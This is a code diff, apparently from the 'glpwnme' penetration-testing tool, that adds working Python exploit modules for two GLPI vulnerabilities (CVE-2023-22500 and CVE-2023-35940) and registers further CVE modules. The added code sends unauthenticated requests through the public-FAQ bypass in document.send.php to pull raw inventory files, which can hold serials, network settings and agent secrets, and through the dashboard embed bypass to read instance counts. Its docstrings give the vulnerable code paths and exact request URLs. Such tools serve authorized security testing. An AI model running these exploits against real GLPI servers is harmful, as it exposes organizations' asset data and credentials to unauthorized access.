Orange-Cyberdefense
diff --git a/‎glpwnme/exploits/implementations/__init__.py‎
Lines changed: 15 additions & 0 deletions b/‎glpwnme/exploits/implementations/__init__.py‎
Lines changed: 15 additions & 0 deletions
diff --git a/‎glpwnme/exploits/implementations/cve_2023_22500.py‎
Lines changed: 196 additions & 0 deletions b/‎glpwnme/exploits/implementations/cve_2023_22500.py‎
Lines changed: 196 additions & 0 deletions
diff --git a/‎glpwnme/exploits/implementations/cve_2023_35940.py‎
Lines changed: 152 additions & 0 deletions b/‎glpwnme/exploits/implementations/cve_2023_35940.py‎
Lines changed: 152 additions & 0 deletions
@@ -27,6 +27,20 @@
 # GLPI classic check
 from .default_password_check import DEFAULT_PASSWORD_CHECK
 
+from .cve_2023_22500 import CVE_2023_22500
+from .cve_2023_35940 import CVE_2023_35940
+from .cve_2024_43416 import CVE_2024_43416
+from .cve_2025_53105 import CVE_2025_53105
+from .cve_2025_53111 import CVE_2025_53111
+from .cve_2025_53112 import CVE_2025_53112
+from .cve_2025_53113 import CVE_2025_53113
+from .cve_2025_53357 import CVE_2025_53357
+from .cve_2025_64516 import CVE_2025_64516
+from .cve_2025_64520 import CVE_2025_64520
+from .cve_2026_32312 import CVE_2026_32312
+from .cve_2026_42318 import CVE_2026_42318
+from .ghsa_mxf4_8mjr_3qh2 import GHSA_MXF4_8MJR_3QH2
+
 def get_all_exploits():
     """
     Return the exploit available as Class
@@ -38,5 +52,6 @@ def get_all_exploits():
     all_exploits = [CVE_2020_15175, CVE_2022_31061, CVE_2022_35914, UNSERIALIZE_ORDER_2022, CVE_2023_41323, CVE_2023_41326]
     all_exploits += [PHP_UPLOAD, CVE_2024_27937, CVE_2024_29889, CVE_2024_37148, CVE_2024_37149]
     all_exploits += [CVE_2024_40638, CVE_2024_50339, CVE_2025_24799, CVE_2025_32786, CVE_2026_26026]
+    all_exploits += [CVE_2023_22500, CVE_2023_35940, CVE_2024_43416, CVE_2025_53105, CVE_2025_53111, CVE_2025_53112, CVE_2025_53113, CVE_2025_53357, CVE_2025_64516, CVE_2025_64520, CVE_2026_32312, CVE_2026_42318, GHSA_MXF4_8MJR_3QH2]
     all_exploits += [DEFAULT_PASSWORD_CHECK]
     return all_exploits
@@ -0,0 +1,196 @@
+from ..exploit import GlpiExploit
+from glpwnme.exploits.logger import Log
+
+
+class CVE_2023_22500(GlpiExploit):
+    """
+    Unauthenticated access to native-inventory files via the public-FAQ bypass in
+    front/document.send.php (GLPI 10.0.0 - 10.0.5).
+
+    The document streamer gated the WHOLE controller on the public-FAQ flag and
+    then served the raw inventory directory with no rights check (10.0.5):
+
+        if (!$CFG_GLPI["use_public_faq"]) {
+            Session::checkLoginUser();         // skipped entirely when FAQ is public
+        }
+        ...
+        } else if (isset($_GET["file"])) {     // arbitrary server file branch
+            $splitter = explode("/", $_GET["file"], 2);
+            ...
+            if ($splitter[0] == "_inventory") {            // NO right check
+                $iconf = new Conf();
+                if ($iconf->isInventoryFile(GLPI_INVENTORY_DIR.'/'.$splitter[1])) {
+                    $send = GLPI_INVENTORY_DIR.'/'.$splitter[1];   // streamed
+                }
+            }
+            if ($send && file_exists($send)) {
+                Toolbox::sendFile($send, ...);             // raw content, no auth
+            } else {
+                Html::displayErrorAndDie('Unauthorized access to this file', true);
+            }
+
+    So when public FAQ is enabled (a common helpdesk config), an anonymous
+    request to:
+
+        /front/document.send.php?file=_inventory/<path>.json
+
+    reaches the inventory branch with no session. A real inventory file
+    (files/_inventories/...) is streamed verbatim; a non-existent one returns the
+    application page "Unauthorized access to this file" - in either case HTTP 200,
+    never a login redirect. These inventory files contain full raw asset data
+    (serials, software, network config, agent secrets).
+
+    Fix (GLPI 10.0.6): Session::checkLoginUser() was moved INSIDE the file=
+    branch so it always runs, and the inventory case gained
+    `&& Session::haveRight(Conf::$rightname, READ)`. Unauthenticated requests now
+    302-redirect to the login page.
+
+    Behaviorally verified: with use_public_faq=1, file=_inventory/<x>.json
+    returns HTTP 200 ("Unauthorized access to this file", or raw file content) on
+    10.0.2 and 10.0.5, and HTTP 302 to /index.php?redirect=... on 10.0.6 / 10.0.7
+    / 10.0.16 / 10.0.25 (same FAQ precondition). front/computer.php stays 302 on
+    every instance, proving the server enforces auth generally and the 200 is the
+    bypass, not a wide-open server.
+
+    Sibling: CVE-2023-35940 (unauth dashboard data, same 10.0.8 era).
+
+    @author unclej4ck
+    @cvss 7.5
+    @name CVE_2023_22500
+    """
+    _impacts = "Information Disclosure, Broken Access Control"
+    _privilege = "Unauthenticated"
+    _is_check_opsec_safe = True
+    min_version = "10.0.0"
+    max_version = "10.0.6"  # exclusive: 10.0.0-10.0.5 vulnerable, fixed in 10.0.6
+
+    _DOC = "/front/document.send.php"
+    _FAQ = "/front/helpdesk.faq.php"
+    _CTRL = "/front/computer.php"  # always login-gated -> proves auth is enforced
+
+    # markers Html::displayErrorAndDie emits from the unauth file= branch
+    _APP_MARKERS = ("Unauthorized access to this file", "Invalid filename")
+
+    # ------------------------------------------------------------------ #
+    # HTTP helpers                                                         #
+    # ------------------------------------------------------------------ #
+
+    def _raw_get(self, path):
+        return self.get(path, timeout=15, allow_redirects=False)
+
+    def _inv_path(self, name):
+        return f"{self._DOC}?file=_inventory/{name}"
+
+    @staticmethod
+    def _is_login_redirect(resp):
+        if resp.status_code not in (301, 302, 303, 307, 308):
+            return False
+        loc = resp.headers.get("Location", "")
+        return "login.php" in loc or "redirect=" in loc or loc.rstrip("/").endswith("index.php")
+
+    def _reached_file_branch(self, resp):
+        """True if the anonymous request reached the file= application logic
+        (200, no login redirect) instead of being bounced to login."""
+        if self._is_login_redirect(resp):
+            return False
+        if resp.status_code != 200:
+            return False
+        body = resp.text or ""
+        # Either a rendered app error from the file branch, or raw streamed
+        # content (non-HTML body for an existing inventory file).
+        if any(m in body for m in self._APP_MARKERS):
+            return True
+        # streamed file: not the login page, not an HTML error shell
+        looks_html = "<html" in body[:200].lower() or "<!DOCTYPE" in body[:200]
+        return not looks_html
+
+    # ------------------------------------------------------------------ #
+    # Exploit interface                                                    #
+    # ------------------------------------------------------------------ #
+
+    def infos(self):
+        infos = "[u]Description:[/u]\n"
+        infos += "Unauthenticated access to native-inventory files via the public-FAQ bypass\n"
+        infos += "in [b]front/document.send.php[/b] (GLPI 10.0.0 - 10.0.5). When public FAQ is\n"
+        infos += "enabled the controller skips [i]checkLoginUser()[/i] and the [b]file=_inventory/[/b]\n"
+        infos += "branch streams files/_inventories content with no rights check.\n"
+        infos += "Fix 10.0.6: login check moved inside the branch + inventory READ right.\n"
+
+        infos += "\n[u]Required:[/u]\n"
+        infos += " - Public FAQ enabled ([i]use_public_faq=1[/i]); the bypass is otherwise login-gated\n"
+
+        infos += "\n[u]Params (run):[/u]\n"
+        infos += " - [i]file[/i]: inventory path under _inventory/ to fetch\n"
+        infos += "   (e.g. computer/<deviceid>.json)\n"
+
+        infos += "\n[u]Usage:[/u]\n"
+        infos += "[grey66]# Check (no auth)[/]\n--check\n\n"
+        infos += "[grey66]# Fetch a known inventory file[/]\n"
+        infos += "--run -O file=computer/<deviceid>.json\n"
+
+        infos += "\nExploit is [green b]Safe[/] (read-only GET probe)"
+        return infos
+
+    def check(self):
+        """
+        Clean differential (precondition: public FAQ enabled):
+          - file=_inventory/<rand>.json -> 200 app page / raw content (vulnerable)
+          - benign control front/computer.php -> login redirect (server DOES gate)
+        Patched (10.0.6+) redirects the same _inventory request to login, so
+        _reached_file_branch is False.
+        """
+        # negative control: a normal page MUST redirect, else the server is wide
+        # open and any 200 is meaningless.
+        ctrl = self._raw_get(self._CTRL)
+        if not self._is_login_redirect(ctrl):
+            Log.log(f"Control {self._CTRL} did not login-redirect "
+                    f"(HTTP {ctrl.status_code}) - server is not auth-gated, "
+                    "differential untrustworthy")
+            return False
+
+        # precondition probe: the bypass only exists when public FAQ is on
+        faq = self._raw_get(self._FAQ)
+        faq_open = (faq.status_code == 200) and not self._is_login_redirect(faq)
+        if not faq_open:
+            Log.log("Public FAQ is disabled - the document.send.php bypass is "
+                    "login-gated on this instance; not exploitable as configured")
+            return False
+
+        Log.log("Public FAQ enabled; requesting an inventory file unauthenticated ...")
+        import uuid
+        probe = self._raw_get(self._inv_path(f"glpwnme-{uuid.uuid4().hex[:10]}.json"))
+        if not self._reached_file_branch(probe):
+            Log.log(f"Inventory file request returned HTTP {probe.status_code} "
+                    f"(login redirect) - patched (10.0.6+)")
+            return False
+
+        Log.msg("Unauthenticated access to the inventory file branch confirmed "
+                "(public FAQ on, control page still login-gated) - CVE-2023-22500")
+        return True
+
+    def run(self, file=None):
+        """Fetch an inventory file unauthenticated. With no -O file, probes the
+        branch and lists guidance; inventory files live under
+        files/_inventories/<itemtype>/<deviceid>.<json|xml>."""
+        if not file:
+            import uuid
+            probe = self._raw_get(self._inv_path(f"glpwnme-{uuid.uuid4().hex[:10]}.json"))
+            if self._reached_file_branch(probe):
+                Log.msg("Inventory file branch reachable unauthenticated. Supply a "
+                        "path with [b]-O file=computer/<deviceid>.json[/b] to fetch "
+                        "raw asset data (serials, software, network, agent secrets).")
+            else:
+                Log.err("Inventory branch not reachable (patched or public FAQ off)")
+            return
+
+        resp = self._raw_get(self._inv_path(file))
+        if self._is_login_redirect(resp):
+            Log.err("Login redirect - patched or public FAQ off")
+            return
+        body = resp.text or ""
+        if resp.status_code == 200 and not any(m in body for m in self._APP_MARKERS):
+            Log.msg(f"Fetched [gold3]_inventory/{file}[/] ({len(body)} bytes):")
+            Log.msg(body if len(body) < 4000 else body[:4000] + "\n...[truncated]")
+            self._write_log(f"CVE-2023-22500 leaked _inventory/{file} ({len(body)} bytes)")
+        else:
+            Log.err(f"No such inventory file (HTTP {resp.status_code}): _inventory/{file}")
@@ -0,0 +1,152 @@
+from ..exploit import GlpiExploit
+from glpwnme.exploits.logger import Log
+
+
+class CVE_2023_35940(GlpiExploit):
+    """
+    Unauthenticated access to dashboard data via the embed bypass in
+    ajax/dashboard.php (GLPI 10.0.0 - 10.0.7).
+
+    The dashboard AJAX controller gates access like this (10.0.7):
+
+        if (!isset($request_data['embed']) || !$request_data['embed']) {
+            Session::checkLoginUser();
+        } else if (!in_array($_REQUEST['action'],
+                   ['get_dashboard_items','get_card','get_cards'])) {
+            Html::displayRightError();
+        }
+
+    When `embed` is truthy AND the action is one of get_card / get_cards /
+    get_dashboard_items, NEITHER Session::checkLoginUser() NOR the embed token
+    check runs. Grid::checkToken() exists but is only invoked from the
+    front/central.php embed() path, never from this handler. So an
+    unauthenticated request to:
+
+        /ajax/dashboard.php?action=get_card&embed=1&dashboard=central
+            &card_id=bn_count_User&args[widgettype]=bigNumber&args[force]=1
+
+    renders the requested card widget and leaks instance data (counts of
+    Users, Tickets, Computers, Software, etc.) with no session and no token.
+
+    Fix (GLPI 10.0.8): the embed branch now calls Grid::checkToken($request_data)
+    and returns 403 when the token is missing/invalid, plus per-action right
+    checks were added. Verified behaviorally: HTTP 200 + rendered count on
+    10.0.1, HTTP 403 on 10.0.9 / 10.0.16 / 10.0.17 / 10.0.25 and on 11.0.x.
+
+    Related dashboard authz fix: CVE-2023-35939 (same 10.0.8 patch, the
+    authenticated cross-dashboard variant).
+
+    @author unclej4ck
+    @cvss 7.5
+    @name CVE_2023_35940
+    """
+    _impacts = "Information Disclosure, Broken Access Control"
+    _privilege = "Unauthenticated"
+    _is_check_opsec_safe = True
+    min_version = "10.0.0"
+    max_version = "10.0.8"  # exclusive: 10.0.0-10.0.7 vulnerable, fixed in 10.0.8
+
+    _EP = "/ajax/dashboard.php"
+
+    # Built-in bigNumber cards. card_id -> the itemtype label the widget renders.
+    _CARDS = [
+        ("bn_count_User", "User"),
+        ("bn_count_Ticket", "Ticket"),
+        ("bn_count_Computer", "Computer"),
+        ("bn_count_Software", "Software"),
+        ("bn_count_Problem", "Problem"),
+    ]
+
+    # ------------------------------------------------------------------ #
+    # HTTP helper                                                          #
+    # ------------------------------------------------------------------ #
+
+    def _get_card(self, card_id, embed=True):
+        params = {
+            "action": "get_card",
+            "dashboard": "central",
+            "card_id": card_id,
+            "args[widgettype]": "bigNumber",
+            "args[force]": "1",
+        }
+        if embed:
+            params["embed"] = "1"
+        return self.get(self._EP, params=params, timeout=15, allow_redirects=False)
+
+    @staticmethod
+    def _is_rendered_card(resp):
+        """A real, non-empty bigNumber card was returned (not empty/error/denied)."""
+        if resp.status_code != 200:
+            return False
+        body = resp.text
+        if "Access denied" in body or "empty-card" in body or "empty card" in body:
+            return False
+        # The bigNumber widget renders <a class="card big-number ..."> with a
+        # <span class="formatted-number"><span class="number">N</span>.
+        return ("big-number" in body or "formatted-number" in body)
+
+    # ------------------------------------------------------------------ #
+    # Exploit interface                                                    #
+    # ------------------------------------------------------------------ #
+
+    def infos(self):
+        infos = "[u]Description:[/u]\n"
+        infos += "Unauthenticated access to dashboard data via the embed bypass in\n"
+        infos += "[b]ajax/dashboard.php[/b] (GLPI 10.0.0 - 10.0.7).\n"
+        infos += "With [b]embed=1[/b] and action [b]get_card[/b]/[b]get_cards[/b], the controller\n"
+        infos += "skips both [i]checkLoginUser()[/i] and the embed token check, rendering any\n"
+        infos += "built-in card and leaking instance counts (users, tickets, assets...).\n"
+
+        infos += "\n[u]Params (run):[/u]\n"
+        infos += " - [i]card (default 'bn_count_User')[/i]: card_id to render\n"
+
+        infos += "\n[u]Usage:[/u]\n"
+        infos += "[grey66]# Check (no auth)[/]\n--check\n\n"
+        infos += "[grey66]# Leak the built-in count cards[/]\n--run\n"
+
+        infos += "\nExploit is [green b]Safe[/] (read-only, GET probe)"
+        return infos
+
+    def check(self):
+        """
+        Clean differential:
+          - embed=1 get_card  -> 200 with a rendered bigNumber card  (vulnerable)
+          - benign no-embed   -> NOT 200 (302 login redirect)        (negative control)
+        Patched (10.0.8+) returns 403 on the embed branch, so _is_rendered_card is False.
+        """
+        Log.log("Sending unauthenticated get_card with embed=1 ...")
+        embed_resp = self._get_card("bn_count_User", embed=True)
+        if not self._is_rendered_card(embed_resp):
+            Log.log(f"Embed get_card returned HTTP {embed_resp.status_code} without a "
+                    "rendered card - patched (10.0.8+) or dashboard unavailable")
+            return False
+
+        Log.log("Negative control: same request WITHOUT embed (must require login) ...")
+        base_resp = self._get_card("bn_count_User", embed=False)
+        if base_resp.status_code == 200 and self._is_rendered_card(base_resp):
+            Log.log("No-embed request also returned a card - not the embed bypass, dropping")
+            return False
+
+        Log.msg("Unauthenticated dashboard card rendered via embed bypass "
+                "(no-embed control denied) - CVE-2023-35940")
+        return True
+
+    def run(self, card=None):
+        """Leak the built-in bigNumber count cards (or a single supplied card_id)."""
+        targets = [(card, card)] if card else self._CARDS
+        any_hit = False
+        for card_id, _label in targets:
+            resp = self._get_card(card_id, embed=True)
+            if not self._is_rendered_card(resp):
+                continue
+            any_hit = True
+            text = resp.text
+            # Strip tags and pull the "<n> <Label>" the bigNumber widget renders.
+            import re
+            flat = re.sub(r"<[^>]*>", " ", text)
+            flat = re.sub(r"\s+", " ", flat).strip()
+            m = re.search(r"(\d[\d,]*)\s+([A-Za-z][A-Za-z ]+)", flat)
+            value = m.group(0).strip() if m else "(rendered, value not parsed)"
+            Log.msg(f"[gold3]{card_id}[/] -> [green b]{value}[/green b]")
+        if not any_hit:
+            Log.err("No card rendered - target patched or dashboard data unavailable")